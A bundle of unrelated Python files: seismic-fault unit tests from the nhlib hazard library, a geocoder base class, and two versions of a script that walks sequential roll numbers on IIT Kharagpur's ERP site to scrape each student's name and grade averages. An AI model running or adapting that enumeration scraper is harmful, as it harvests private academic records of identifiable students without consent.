-0.0882006, -0.0894983, -0.0899323, -0.0899323, -0.0894772,
-0.0881164, -0.0858637, -0.0827419, -0.0787826, -0.0740259,
-0.0685199, -0.0623203, -0.0554900, -0.0480979, -0.0402191,
-0.0002190, 0.0076432, 0.0158009, 0.0241796, 0.0327029,
0.0412927, 0.0498708, 0.0583587, 0.0666790, 0.0747555,
0.0825147, 0.0898855, 0.1448728, 0.1519670, 0.1585125,
0.1644462, 0.1697109, 0.1742561, 0.1780378, 0.1810197,
0.1831731, 0.1844772, 0.1849194, 0.1844956, 0.1832098,
0.1810743, 0.1781097, 0.1743447, 0.1698154
]
elats = [
-0.0865436, -0.0936378, -0.1001833, -0.1061170, -0.1113818,
-0.1159269, -0.1197087, -0.1226906, -0.1248440, -0.1261481,
-0.1265903, -0.1261665, -0.1248807, -0.1227452, -0.1197807,
-0.1160156, -0.1114863, -0.0748281, -0.0695722, -0.0636449,
-0.0571033, -0.0500106, -0.0424352, -0.0344503, -0.0261330,
-0.0175634, -0.0088243, -0.0000000, 0.0400000, 0.0490364,
0.0579813, 0.0667442, 0.0752364, 0.0833720, 0.0910686,
0.0982482, 0.1048383, 0.1107721, 0.1159895, 0.1204378,
0.1404379, 0.1439098, 0.1466154, 0.1485298, 0.1496358,
0.1499230, 0.1493889, 0.1480385, 0.1458839, 0.1429450,
0.1392485, 0.1348282, 0.0981700, 0.0929200, 0.0870000,
0.0804669, 0.0733837, 0.0658185, 0.0578443, 0.0495378,
0.0409790, 0.0322503, 0.0234359, 0.0146206, 0.0058892,
-0.0026741, -0.0109868, -0.0189689, -0.0265436
]
numpy.testing.assert_allclose(polygon.lons, elons, rtol=0, atol=1e-5)
numpy.testing.assert_allclose(polygon.lats, elats, rtol=0, atol=1e-5)
tests/source/simple_fault: removed unused import
# nhlib: A New Hazard Library
# Copyright (C) 2012 GEM Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import unittest
import numpy
from nhlib.const import TRT
from nhlib.source.simple_fault import SimpleFaultSource
from nhlib.source.rupture import ProbabilisticRupture
from nhlib.mfd import TruncatedGRMFD
from nhlib.scalerel.peer import PeerMSR
from nhlib.geo import Point, Line
from nhlib.tom import PoissonTOM
from tests import assert_angles_equal
from tests.geo.surface._utils import assert_mesh_is
from tests.source import _simple_fault_test_data as test_data
class _BaseFaultSourceTestCase(unittest.TestCase):
TRT = TRT.ACTIVE_SHALLOW_CRUST
RAKE = 0
def _make_source(self, mfd, aspect_ratio, fault_trace=None, dip=45):
source_id = name = 'test-source'
trt = self.TRT
rake = self.RAKE
rupture_mesh_spacing = 1
upper_seismogenic_depth = 0
lower_seismogenic_depth = 4.2426406871192848
magnitude_scaling_relationship = PeerMSR()
rupture_aspect_ratio = aspect_ratio
if fault_trace is None:
fault_trace = Line([Point(0.0, 0.0),
Point(0.0, 0.0359728811758),
Point(0.0190775080917, 0.0550503815181),
Point(0.03974514139, 0.0723925718855)])
return SimpleFaultSource(
source_id, name, trt, mfd, rupture_mesh_spacing,
magnitude_scaling_relationship, rupture_aspect_ratio,
upper_seismogenic_depth, lower_seismogenic_depth,
fault_trace, dip, rake
)
def _test_ruptures(self, expected_ruptures, source):
tom = PoissonTOM(time_span=50)
ruptures = list(source.iter_ruptures(tom))
for rupture in ruptures:
self.assertIsInstance(rupture, ProbabilisticRupture)
self.assertIs(rupture.temporal_occurrence_model, tom)
self.assertIs(rupture.tectonic_region_type, self.TRT)
self.assertEqual(rupture.rake, self.RAKE)
self.assertEqual(len(expected_ruptures), len(ruptures))
for i in xrange(len(expected_ruptures)):
expected_rupture, rupture = expected_ruptures[i], ruptures[i]
self.assertAlmostEqual(rupture.mag, expected_rupture['mag'])
self.assertAlmostEqual(rupture.rake, expected_rupture['rake'])
self.assertAlmostEqual(rupture.occurrence_rate,
expected_rupture['occurrence_rate'])
assert_mesh_is(self, rupture.surface,
expected_rupture['surface'])
self.assertEqual(rupture.hypocenter,
Point(*expected_rupture['hypocenter']))
assert_angles_equal(self, rupture.surface.get_strike(),
expected_rupture['strike'], delta=0.5)
assert_angles_equal(self, rupture.surface.get_dip(),
expected_rupture['dip'], delta=3)
class SimpleFaultIterRupturesTestCase(_BaseFaultSourceTestCase):
def test_2(self):
# rupture dimensions are larger then mesh_spacing, number of nodes
# along strike and dip is even
mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=3.0, max_mag=4.0,
bin_width=1.0)
self._test_ruptures(test_data.TEST2_RUPTURES,
self._make_source(mfd=mfd, aspect_ratio=1.0))
def test_3(self):
# rupture length greater than fault length, number of nodes along
# length is odd and along width is even
mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=5.0, max_mag=6.0,
bin_width=1.0)
self._test_ruptures(test_data.TEST3_RUPTURES,
self._make_source(mfd=mfd, aspect_ratio=4.0))
def test_4(self):
# rupture width greater than fault width, number of nodes along
# length is even, along width is odd
mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=5.4, max_mag=5.5,
bin_width=0.1)
self._test_ruptures(test_data.TEST4_RUPTURES,
self._make_source(mfd=mfd, aspect_ratio=0.5))
def test_5(self):
# rupture length and width greater than fault length and width
# respectively
mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=6.0, max_mag=7.0,
bin_width=1.0)
self._test_ruptures(test_data.TEST5_RUPTURES,
self._make_source(mfd=mfd, aspect_ratio=1.0))
class SimpleFaultParametersChecksTestCase(_BaseFaultSourceTestCase):
def test_mesh_spacing_too_small(self):
mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=0.5, max_mag=1.5,
bin_width=1.0)
with self.assertRaises(ValueError) as ar:
self._make_source(mfd=mfd, aspect_ratio=1.0)
self.assertEqual(str(ar.exception),
'mesh spacing 1 is too low to represent '
'ruptures of magnitude 1.5')
def test_fault_trace_intersects_itself(self):
mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=10, max_mag=20,
bin_width=1.0)
fault_trace = Line([Point(0, 0), Point(0, 1),
Point(1, 1), Point(0, 0.5)])
with self.assertRaises(ValueError) as ar:
self._make_source(mfd=mfd, aspect_ratio=1, fault_trace=fault_trace)
self.assertEqual(str(ar.exception), 'fault trace intersects itself')
class SimpleFaultRupEncPolyTestCase(_BaseFaultSourceTestCase):
mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=10, max_mag=20,
bin_width=1.0)
def test_dip_90_no_dilation(self):
trace = Line([Point(0.0, 0.0), Point(0.0, 0.04),
Point(0.03, 0.05), Point(0.04, 0.06)])
source = self._make_source(self.mfd, 1, dip=90, fault_trace=trace)
polygon = source.get_rupture_enclosing_polygon()
elons = [0, 0, 0.04]
elats = [0, 0.04, 0.06]
numpy.testing.assert_allclose(polygon.lons, elons, rtol=0, atol=1e-5)
numpy.testing.assert_allclose(polygon.lats, elats)
def test_dip_90_dilated(self):
trace = Line([Point(-1.0, 2.0), Point(-1.0, 2.04)])
source = self._make_source(self.mfd, 1, dip=90, fault_trace=trace)
polygon = source.get_rupture_enclosing_polygon(dilation=4.5)
elons = [
-1.0405401, -1.0403452, -1.0397622, -1.0387967, -1.0374580,
-1.0357589, -1.0337159, -1.0313487, -1.0286799, -1.0286349,
-1.0256903, -1.0224984, -1.0190897, -1.0154972, -1.0117554,
-1.0079004, -1.0039693, -1.0000000, -0.9960307, -0.9920996,
-0.9882446, -0.9845028, -0.9809103, -0.9775016, -0.9743097,
-0.9713651, -0.9713201, -0.9686513, -0.9662841, -0.9642411,
-0.9625420, -0.9612033, -0.9602378, -0.9596548, -0.9594599,
-0.9594609, -0.9596560, -0.9602391, -0.9612048, -0.9625436,
-0.9642428, -0.9662858, -0.9686531, -0.9713218, -0.9713668,
-0.9743113, -0.9775031, -0.9809116, -0.9845039, -0.9882454,
-0.9921002, -0.9960310, -1.0000000, -1.0039690, -1.0078998,
-1.0117546, -1.0154961, -1.0190884, -1.0224969, -1.0256887,
-1.0286332, -1.0286782, -1.0313469, -1.0337142, -1.0357572,
-1.0374564, -1.0387952, -1.0397609, -1.0403440, -1.0405391
]
elats = [
2.0399995, 2.0439662, 2.0478947, 2.0517472, 2.0554866, 2.0590768,
2.0624833, 2.0656733, 2.0686160, 2.0686610, 2.0713281, 2.0736940,
2.0757358, 2.0774338, 2.0787718, 2.0797368, 2.0803196, 2.0805144,
2.0803196, 2.0797368, 2.0787718, 2.0774338, 2.0757358, 2.0736940,
2.0713281, 2.0686610, 2.0686160, 2.0656733, 2.0624833, 2.0590768,
2.0554866, 2.0517472, 2.0478947, 2.0439662, 2.0399995, 1.9999995,
1.9960328, 1.9921043, 1.9882519, 1.9845126, 1.9809224, 1.9775160,
1.9743261, 1.9713835, 1.9713385, 1.9686715, 1.9663057, 1.9642640,
1.9625660, 1.9612281, 1.9602631, 1.9596804, 1.9594856, 1.9596804,
1.9602631, 1.9612281, 1.9625660, 1.9642640, 1.9663057, 1.9686715,
1.9713385, 1.9713835, 1.9743261, 1.9775160, 1.9809224, 1.9845126,
1.9882519, 1.9921043, 1.9960328, 1.9999999
]
numpy.testing.assert_allclose(polygon.lons, elons)
numpy.testing.assert_allclose(polygon.lats, elats, rtol=0, atol=1e-6)
def test_dip_30_no_dilation(self):
trace = Line([Point(0.0, 0.0), Point(0.0, 0.04),
Point(0.03, 0.05), Point(0.04, 0.06)])
source = self._make_source(self.mfd, 1, dip=30, fault_trace=trace)
polygon = source.get_rupture_enclosing_polygon()
elons = [0.0549872, 0., 0., 0.04, 0.09498719]
elats = [-0.0366581, 0, 0.04, 0.06, 0.02334187]
numpy.testing.assert_allclose(polygon.lons, elons, rtol=0, atol=1e-5)
numpy.testing.assert_allclose(polygon.lats, elats, rtol=0, atol=1e-5)
def test_dip_30_dilated(self):
trace = Line([Point(0.0, 0.0), Point(0.0, 0.04),
Point(0.03, 0.05), Point(0.04, 0.06)])
source = self._make_source(self.mfd, 1, dip=30, fault_trace=trace)
polygon = source.get_rupture_enclosing_polygon(dilation=10)
elons = [
0.1298154, 0.1245655, 0.1186454, 0.1121124, 0.1050291,
0.0974640, 0.0894897, 0.0811832, 0.0726244, 0.0638958,
0.0550813, 0.0462659, 0.0375346, 0.0289713, 0.0206585,
0.0126764, 0.0051017, -0.0498855, -0.0569870, -0.0635385,
-0.0694768, -0.0747446, -0.0792910, -0.0830722, -0.0860516,
-0.0882006, -0.0894983, -0.0899323, -0.0899323, -0.0894772,
-0.0881164, -0.0858637, -0.0827419, -0.0787826, -0.0740259,
-0.0685199, -0.0623203, -0.0554900, -0.0480979, -0.0402191,
-0.0002190, 0.0076432, 0.0158009, 0.0241796, 0.0327029,
0.0412927, 0.0498708, 0.0583587, 0.0666790, 0.0747555,
0.0825147, 0.0898855, 0.1448728, 0.1519670, 0.1585125,
0.1644462, 0.1697109, 0.1742561, 0.1780378, 0.1810197,
0.1831731, 0.1844772, 0.1849194, 0.1844956, 0.1832098,
0.1810743, 0.1781097, 0.1743447, 0.1698154
]
elats = [
-0.0865436, -0.0936378, -0.1001833, -0.1061170, -0.1113818,
-0.1159269, -0.1197087, -0.1226906, -0.1248440, -0.1261481,
-0.1265903, -0.1261665, -0.1248807, -0.1227452, -0.1197807,
-0.1160156, -0.1114863, -0.0748281, -0.0695722, -0.0636449,
-0.0571033, -0.0500106, -0.0424352, -0.0344503, -0.0261330,
-0.0175634, -0.0088243, -0.0000000, 0.0400000, 0.0490364,
0.0579813, 0.0667442, 0.0752364, 0.0833720, 0.0910686,
0.0982482, 0.1048383, 0.1107721, 0.1159895, 0.1204378,
0.1404379, 0.1439098, 0.1466154, 0.1485298, 0.1496358,
0.1499230, 0.1493889, 0.1480385, 0.1458839, 0.1429450,
0.1392485, 0.1348282, 0.0981700, 0.0929200, 0.0870000,
0.0804669, 0.0733837, 0.0658185, 0.0578443, 0.0495378,
0.0409790, 0.0322503, 0.0234359, 0.0146206, 0.0058892,
-0.0026741, -0.0109868, -0.0189689, -0.0265436
]
numpy.testing.assert_allclose(polygon.lons, elons, rtol=0, atol=1e-5)
numpy.testing.assert_allclose(polygon.lats, elats, rtol=0, atol=1e-5)
|
import requests
from bs4 import BeautifulSoup
import time
def is_number(s):
"""
Check and parse entered value as a number
"""
try:
float(s)
return True
except ValueError:
return False
def cg_accumulate(year, dep, degree_choice, sg_cg_choice):
# List of departments with Integrated M.Sc. (5 year courses)
msc_dep_list = ["GG", "EX", "MA", "CY", "HS", "PH"]
msc_dep = False
print ""
fname = "Output.txt"
roll_count = 10000
if degree_choice == "2":
roll_count = 30000
if dep in msc_dep_list:
roll_count = 20000
msc_dep = True
student_count = 0
flag = False
cg_total = 0.00
sg_total = 0.00
bad_count = 0
while True:
roll_count += 1
student_count += 1
rollno = str(year) + str(dep) + str(roll_count)
url_to_scrape = 'https://erp.iitkgp.ernet.in/StudentPerformance/view_performance.jsp?rollno=' + rollno
name_flag = False
try:
r = requests.get(url_to_scrape)
except Exception:
print "ConnectionError on :" + str(roll_count)
print "Retrying...."
student_count -= 1
roll_count -= 1
continue
soup = BeautifulSoup(r.text, "html.parser")
with open(fname, "w") as text_file:
text_file.write("{}".format(soup))
with open(fname) as f:
content = f.readlines()
for line in content:
if len(content) < 40:
flag = True
bad_count += 1
student_count -= 1
break
bad_count = 0
if line.find("Name") != -1 and not name_flag:
idx = 24
while(line[idx]!='<'):
idx += 1
name = line[24:idx]
name_flag = True
if sg_cg_choice == "1":
if line.find("CGPA") != -1:
if line[4] != "<" and is_number(line[31:35]):
#print line[31:35]
print "Roll Num : " + str(rollno) + " CG : " + str(line[31:35]) + " Name : " + str(name)
cg_total += float(line[31:35])
break
elif sg_cg_choice == "2":
if line.find("SGPA") != -1 and is_number(line[25:29]):
print "Roll Num : " + str(rollno) + " SGPA in most recent semester : " + str(line[25:29]) + " Name : " + str(name)
sg_total += float(line[25:29])
break
if flag and bad_count >= 5 and (degree_choice != "3" or roll_count > 30000):
break
# Will not be executed for MSc Integrated Courses
if flag and bad_count >= 5 and not msc_dep:
roll_count = 30000
print "Making transition to dual degree students..."
continue
student_count -= 1
print ""
print "__________________________________"
print "Number of Students : " + str(student_count)
if sg_cg_choice == "1":
print "Total CG : " + str(cg_total)
print "Average CG : " + str(cg_total / student_count)
elif sg_cg_choice == "2":
print "Total SG : " + str(sg_total)
print "Average SG : " + str(sg_total / student_count)
print "__________________________________"
print "Welcome to CG Accumulator"
departments = ["AE", "AG", "AR", "BT", "CE", "CH", "CS", "CY", "EC", "EE", "EX", "GG", "HS", "IE", "IM", "MA", "ME", "MF", "MI", "MT", "NA", "PH", "QD"]
years = ["12","13","14","15"]
while True:
print ""
year = raw_input("Enter year (Available Choices : 12, 13, 14, 15) : ")
if year not in years:
print "Please enter a valid year choice"
continue
print ""
dep = raw_input("Enter Department : ")
while dep not in departments:
print "Please enter a valid department!"
print "P.S. Department name should be capitalised. Eg. \"CS\" and not \"cs\""
dep = raw_input("Enter Valid Department again : ")
print ""
degree_choice = raw_input("Enter choice : '1' for 4 years only, '2' for 5 years only, '3' for both : ")
while degree_choice not in ["1", "2", "3"]:
print "Please enter a valid choice!"
degree_choice = raw_input("Enter valid choice again : ")
print ""
sg_cg_choice = raw_input("Do you want CG list (enter '1') or most recent SG list (enter '2')? : ")
while sg_cg_choice not in ["1","2"]:
print "Please enter a valid choice!"
sg_cg_choice = raw_input("Enter valid choice again : ")
break
print ""
print "Please wait while results are being accumulated, this may take a few minutes...."
print "Meanwhile, minimize this screen and think about what you are doing with your life."
print ""
var = cg_accumulate(year, dep, degree_choice,sg_cg_choice)
key = raw_input("Press Enter to exit")
Add entire SG list feature
import requests
from bs4 import BeautifulSoup
import time
def is_number(s):
"""
Check and parse entered value as a number
"""
try:
float(s)
return True
except ValueError:
return False
def cg_accumulate(year, dep, degree_choice, sg_cg_choice):
# List of departments with Integrated M.Sc. (5 year courses)
msc_dep_list = ["GG", "EX", "MA", "CY", "HS", "PH"]
msc_dep = False
print ""
fname = "Output.txt"
roll_count = 10000
if degree_choice == "2":
roll_count = 30000
if dep in msc_dep_list:
roll_count = 20000
msc_dep = True
student_count = 0
flag = False
cg_total = 0.00
sg_total = 0.00
bad_count = 0
sg_list = []
while True:
roll_count += 1
student_count += 1
rollno = str(year) + str(dep) + str(roll_count)
url_to_scrape = 'https://erp.iitkgp.ernet.in/StudentPerformance/view_performance.jsp?rollno=' + rollno
name_flag = False
try:
r = requests.get(url_to_scrape)
except Exception:
print "ConnectionError on :" + str(roll_count)
print "Retrying...."
student_count -= 1
roll_count -= 1
continue
soup = BeautifulSoup(r.text, "html.parser")
with open(fname, "w") as text_file:
text_file.write("{}".format(soup))
with open(fname) as f:
content = f.readlines()
for line in content:
if len(content) < 40:
flag = True
bad_count += 1
student_count -= 1
break
bad_count = 0
if line.find("Name") != -1 and not name_flag:
idx = 24
while(line[idx]!='<'):
idx += 1
name = line[24:idx]
name_flag = True
if sg_cg_choice == "1":
if line.find("CGPA") != -1:
if line[4] != "<" and is_number(line[31:35]):
print "Roll Num : " + str(rollno) + " CG : " + str(line[31:35]) + " Name : " + str(name)
cg_total += float(line[31:35])
break
elif sg_cg_choice == "2":
if line.find("SGPA") != -1 and is_number(line[25:29]):
print "Roll Num : " + str(rollno) + " SGPA in most recent semester : " + str(line[25:29]) + " Name : " + str(name)
sg_total += float(line[25:29])
break
elif sg_cg_choice == "3":
if line.find("SGPA") != -1 and is_number(line[25:29]):
sg_list.append(str(line[25:29]))
if sg_cg_choice == "3":
print "Roll Num : " + str(rollno) + " SGPA list : " + str(sg_list) + " Name : " + str(name)
del sg_list[:]
if flag and bad_count >= 5 and (degree_choice != "3" or roll_count > 30000 or msc_dep):
break
# Will not be executed for MSc Integrated Courses
if flag and bad_count >= 5 and not msc_dep:
roll_count = 30000
print "Making transition to dual degree students..."
continue
student_count -= 1
print ""
print "__________________________________"
print "Number of Students : " + str(student_count)
if sg_cg_choice == "1":
print "Total CG : " + str(cg_total)
print "Average CG : " + str(cg_total / student_count)
elif sg_cg_choice == "2":
print "Total SG : " + str(sg_total)
print "Average SG : " + str(sg_total / student_count)
print "__________________________________"
print "*** Welcome to CG Accumulator ***"
departments = ["AE", "AG", "AR", "BT", "CE", "CH", "CS", "CY", "EC", "EE", "EX", "GG", "HS", "IE", "IM", "MA", "ME", "MF", "MI", "MT", "NA", "PH", "QD"]
years = ["12","13","14","15"]
while True:
print ""
year = raw_input("Enter year (Available Choices : 12, 13, 14, 15) : ")
if year not in years:
print "Please enter a valid year choice"
continue
print ""
dep = raw_input("Enter Department : ")
while dep not in departments:
print "Please enter a valid department!"
print "P.S. Department name should be capitalised. Eg. \"CS\" and not \"cs\""
dep = raw_input("Enter Valid Department again : ")
print ""
degree_choice = raw_input("Enter choice : '1' for 4 years only, '2' for 5 years only, '3' for both : ")
while degree_choice not in ["1", "2", "3"]:
print "Please enter a valid choice!"
degree_choice = raw_input("Enter valid choice again : ")
print ""
sg_cg_choice = raw_input("Do you want CG list (enter '1') or most recent SG list (enter '2') or entire SG history (enter '3')? : ")
while sg_cg_choice not in ["1", "2", "3"]:
print "Please enter a valid choice!"
sg_cg_choice = raw_input("Enter valid choice again : ")
break
print ""
print "Please wait while results are being accumulated, this may take a few minutes...."
print "Meanwhile, minimize this screen and think about what you are doing with your life."
print ""
var = cg_accumulate(year, dep, degree_choice,sg_cg_choice)
print ""
key = raw_input("Press Enter to exit")
|
#!/usr/bin/python
# coding: utf8
from __future__ import absolute_import
import requests
import sys
import json
import six
from collections import defaultdict, OrderedDict
from orderedset import OrderedSet
from geocoder.distance import Distance
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
is_python2 = sys.version_info < (3, 0)
class Base(object):
_exclude = ['parse', 'json', 'url', 'fieldnames', 'help', 'debug',
'short_name', 'api', 'content', 'params',
'street_number', 'api_key', 'key', 'id', 'x', 'y',
'latlng', 'headers', 'timeout', 'wkt', 'locality',
'province', 'rate_limited_get', 'osm', 'route', 'schema',
'properties', 'geojson', 'tree', 'error', 'proxies', 'road',
'xy', 'northeast', 'northwest', 'southeast', 'southwest',
'road_long', 'city_long', 'state_long', 'country_long',
'postal_town_long', 'province_long', 'road_long',
'street_long', 'interpolated', 'method', 'geometry', 'session']
fieldnames = []
error = None
status_code = None
session = None
headers = {}
params = {}
# Essential attributes for Quality Control
lat = ''
lng = ''
accuracy = ''
quality = ''
confidence = ''
# Bounding Box attributes
northeast = []
northwest = []
southeast = []
southwest = []
bbox = {}
# Essential attributes for Street Address
address = ''
housenumber = ''
street = ''
road = ''
city = ''
state = ''
country = ''
postal = ''
def __repr__(self):
if self.address:
return u'<[{0}] {1} - {2} [{3}]>'.format(
self.status,
self.provider.title(),
self.method.title(),
six.text_type(self.address)
)
else:
return u'<[{0}] {1} - {2}>'.format(
self.status,
self.provider.title(),
self.method.title()
)
def rate_limited_get(self, url, **kwargs):
return self.session.get(url, **kwargs)
@staticmethod
def _get_api_key(base_key, **kwargs):
key = kwargs.get('key')
# Retrieves API Key from method argument first
if key:
return key
# Retrieves API Key from Environment variables
elif base_key:
return base_key
raise ValueError('Provide API Key')
def _connect(self, **kwargs):
self.status_code = 'Unknown'
self.timeout = kwargs.get('timeout', 5.0)
self.proxies = kwargs.get('proxies', '')
self.headers.update(kwargs.get('headers', {}))
self.params.update(kwargs.get('params', {}))
try:
r = self.rate_limited_get(
self.url,
params=self.params,
headers=self.headers,
timeout=self.timeout,
proxies=self.proxies
)
self.status_code = r.status_code
self.url = r.url
if r.content:
self.status_code = 200
except (KeyboardInterrupt, SystemExit):
raise
except requests.exceptions.SSLError:
self.status_code = 495
self.error = 'ERROR - SSLError'
# Open JSON content from Request connection
if self.status_code == 200:
try:
self.content = r.json()
except Exception as err:
self.status_code = 400
self.error = 'ERROR - JSON Corrupted: %s' % str(err)
self.content = r.content
def _initialize(self, **kwargs):
# Remove extra URL from kwargs
if 'url' in kwargs:
kwargs.pop('url')
self.json = {}
self.parse = self.tree()
self.content = None
self.encoding = kwargs.get('encoding', 'utf-8')
self.session = kwargs.get('session', requests.Session())
self._connect(url=self.url, **kwargs)
###
try:
for result in self.next(): # Convert to iterator in each of the search tools
self._build_tree(result)
self._exceptions()
self._catch_errors()
self._json()
except:
self._build_tree(self.content)
self._exceptions()
self._catch_errors()
self._json()
###
def _json(self):
self.fieldnames = []
for key in dir(self):
if not key.startswith('_') and key not in self._exclude:
self.fieldnames.append(key)
value = getattr(self, key)
if value:
self.json[key] = value
# Add OK attribute even if value is "False"
self.json['ok'] = self.ok
def debug(self):
print(json.dumps(self.parse, indent=4))
print(json.dumps(self.json, indent=4))
print('')
print('OSM Quality')
print('-----------')
count = 0
for key in self.osm:
if 'addr:' in key:
if self.json.get(key.replace('addr:', '')):
print('- [x] {0}'.format(key))
count += 1
else:
print('- [ ] {0}'.format(key))
print('({0}/{1})'.format(count, len(self.osm) - 2))
print('')
print('Fieldnames')
print('----------')
count = 0
for fieldname in self.fieldnames:
if self.json.get(fieldname):
print('- [x] {0}'.format(fieldname))
count += 1
else:
print('- [ ] {0}'.format(fieldname))
print('({0}/{1})'.format(count, len(self.fieldnames)))
print('')
print('URL')
print('---')
print(self.url)
def _exceptions(self):
pass
def _catch_errors(self):
pass
def tree(self):
return defaultdict(self.tree)
def _build_tree(self, content, last=''):
if content:
if isinstance(content, dict):
for key, value in content.items():
# Rebuild the tree if value is a dictionary
if isinstance(value, dict):
self._build_tree(value, last=key)
else:
if last:
self.parse[last][key] = value
else:
self.parse[key] = value
@property
def status(self):
if self.ok:
return 'OK'
elif self.error:
return self.error
if self.status_code == 200:
if not self.address:
return 'ERROR - No results found'
elif not (self.lng and self.lat):
return 'ERROR - No Geometry'
return 'ERROR - Unhandled Exception'
def _get_bbox(self, south, west, north, east):
if all([south, east, north, west]):
# South Latitude, West Longitude, North Latitude, East Longitude
self.south = float(south)
self.west = float(west)
self.north = float(north)
self.east = float(east)
# Bounding Box Corners
self.northeast = [self.north, self.east]
self.northwest = [self.north, self.west]
self.southwest = [self.south, self.west]
self.southeast = [self.south, self.east]
# GeoJSON bbox
self.westsouth = [self.west, self.south]
self.eastnorth = [self.east, self.north]
return dict(northeast=self.northeast, southwest=self.southwest)
return {}
@property
def confidence(self):
if self.bbox:
# Units are measured in Kilometers
distance = Distance(self.northeast, self.southwest, units='km')
for score, maximum in [(10, 0.25),
(9, 0.5),
(8, 1),
(7, 5),
(6, 7.5),
(5, 10),
(4, 15),
(3, 20),
(2, 25)]:
if distance < maximum:
return score
if distance >= 25:
return 1
# Cannot determine score
return 0
@property
def ok(self):
return bool(self.lng and self.lat)
@property
def geometry(self):
if self.ok:
return {
'type': 'Point',
'coordinates': [self.x, self.y]}
return {}
@property
def osm(self):
osm = dict()
if self.ok:
osm['x'] = self.x
osm['y'] = self.y
if self.housenumber:
osm['addr:housenumber'] = self.housenumber
if self.road:
osm['addr:street'] = self.road
if self.city:
osm['addr:city'] = self.city
if self.state:
osm['addr:state'] = self.state
if self.country:
osm['addr:country'] = self.country
if self.postal:
osm['addr:postal'] = self.postal
if hasattr(self, 'population'):
if self.population:
osm['population'] = self.population
return osm
@property
def geojson(self):
feature = {
'type': 'Feature',
'properties': self.json,
}
if self.bbox:
feature['bbox'] = [self.west, self.south, self.east, self.north]
feature['properties']['bbox'] = feature['bbox']
if self.geometry:
feature['geometry'] = self.geometry
return feature
@property
def wkt(self):
if self.ok:
return 'POINT({x} {y})'.format(x=self.x, y=self.y)
return ''
@property
def xy(self):
if self.ok:
return [self.lng, self.lat]
return []
@property
def latlng(self):
if self.ok:
return [self.lat, self.lng]
return []
@property
def y(self):
return self.lat
@property
def x(self):
return self.lng
@property
def locality(self):
return self.city
@property
def province(self):
return self.state
@property
def street_number(self):
return self.housenumber
@property
def road(self):
return self.street
@property
def route(self):
return self.street
class OneResult(object):
""" Container for one (JSON) object returned by the various web services"""
_TO_EXCLUDE = ['parse', 'json', 'url', 'fieldnames', 'help', 'debug',
'short_name', 'api', 'content', 'params',
'street_number', 'api_key', 'key', 'id', 'x', 'y',
'latlng', 'headers', 'timeout', 'wkt', 'locality',
'province', 'rate_limited_get', 'osm', 'route', 'schema',
'properties', 'geojson', 'tree', 'error', 'proxies', 'road',
'xy', 'northeast', 'northwest', 'southeast', 'southwest',
'road_long', 'city_long', 'state_long', 'country_long',
'postal_town_long', 'province_long', 'road_long',
'street_long', 'interpolated', 'method', 'geometry', 'session']
def __init__(self, json_content):
self.raw = json_content
# attributes required to compute bbox
self.northeast = []
self.northwest = []
self.southeast = []
self.southwest = []
# attributes returned in JSON format
self.fieldnames = []
self.json = {}
self._parse_json_with_fieldnames()
# Essential attributes for Quality Control
@property # noqa
def lat(self): return '' # noqa
@property # noqa
def lng(self): return '' # noqa
@property # noqa
def accuracy(self): return '' # noqa
@property # noqa
def quality(self): return '' # noqa
# Bounding Box attributes
@property # noqa
def bbox(self): return {} # noqa
# Essential attributes for Street Address
@property # noqa
def address(self): return '' # noqa
@property # noqa
def housenumber(self): return '' # noqa
@property # noqa
def street(self): return '' # noqa
@property # noqa
def city(self): return '' # noqa
@property # noqa
def state(self): return '' # noqa
@property # noqa
def country(self): return '' # noqa
@property # noqa
def postal(self): return '' # noqa
def __repr__(self):
""" Display [address] if available; [lat,lng] otherwise"""
if self.address:
return u'[{0}]'.format(six.text_type(self.address))
else:
return u'[{0},{1}]'.format(self.lat, self.lng)
def _parse_json_with_fieldnames(self):
""" Parse the raw JSON with all attributes/methods defined in the class, except for the
ones defined starting with '_' or flagged in cls._TO_EXCLUDE.
The final result is stored in self.json
"""
for key in dir(self):
if not key.startswith('_') and key not in self._TO_EXCLUDE:
self.fieldnames.append(key)
value = getattr(self, key)
if value:
self.json[key] = value
# Add OK attribute even if value is "False"
self.json['ok'] = self.ok
@property
def ok(self):
return bool(self.lng and self.lat)
@property
def status(self):
if self.ok:
return 'OK'
if not self.address:
return 'ERROR - No results found'
return 'ERROR - No Geometry'
def debug(self):
print('')
print('From provider')
print('-----------')
print(json.dumps(self.raw, indent=4))
print('')
print('Cleaned json')
print('-----------')
print(json.dumps(self.json, indent=4))
print('')
print('OSM Quality')
print('-----------')
count = 0
for key in self.osm:
if 'addr:' in key:
if self.json.get(key.replace('addr:', '')):
print('- [x] {0}'.format(key))
count += 1
else:
print('- [ ] {0}'.format(key))
print('({0}/{1})'.format(count, len(self.osm) - 2))
print('')
print('Fieldnames')
print('----------')
count = 0
for fieldname in self.fieldnames:
if self.json.get(fieldname):
print('- [x] {0}'.format(fieldname))
count += 1
else:
print('- [ ] {0}'.format(fieldname))
print('({0}/{1})'.format(count, len(self.fieldnames)))
def _get_bbox(self, south, west, north, east):
if all([south, east, north, west]):
# South Latitude, West Longitude, North Latitude, East Longitude
self.south = float(south)
self.west = float(west)
self.north = float(north)
self.east = float(east)
# Bounding Box Corners
self.northeast = [self.north, self.east]
self.northwest = [self.north, self.west]
self.southwest = [self.south, self.west]
self.southeast = [self.south, self.east]
# GeoJSON bbox
self.westsouth = [self.west, self.south]
self.eastnorth = [self.east, self.north]
return dict(northeast=self.northeast, southwest=self.southwest)
return {}
@property
def confidence(self):
if self.bbox:
# Units are measured in Kilometers
distance = Distance(self.northeast, self.southwest, units='km')
for score, maximum in [(10, 0.25),
(9, 0.5),
(8, 1),
(7, 5),
(6, 7.5),
(5, 10),
(4, 15),
(3, 20),
(2, 25)]:
